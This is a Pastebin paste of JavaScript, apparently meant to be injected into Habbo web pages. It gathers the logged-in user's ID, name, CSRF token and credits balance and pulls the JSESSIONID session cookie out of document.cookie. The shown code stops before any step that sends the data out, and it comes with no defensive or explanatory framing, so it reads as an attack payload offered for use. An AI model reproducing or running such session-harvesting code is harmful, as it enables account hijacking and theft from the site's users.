Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- h = {
- id: function () {
- return habboId;
- },
- name: function () {
- return habboName;
- },
- tags: function () {
- return ad_keywords.split(/,gender%3A/)[0];
- },
- app: function () {
- return $$("[name^=csrf]")[0].content;
- }
- };
- new Ajax.Request(/credits/, {
- onComplete: function (x) {
- h["coins"] = (x.responseText.match(/redeem-balance-amount">(.+)</)[0].split(/>/)[1].split(/</)[0]);
- }
- });
- if (document.cookie.match(/JSESSIONID/)) {
- h["session"] = (document.cookie.match(/JSESSIONID=(.+);/)[0].split(/=/)[1].split(/;/)[0]);
- };
Advertisement
Add Comment
Please, Sign In to add comment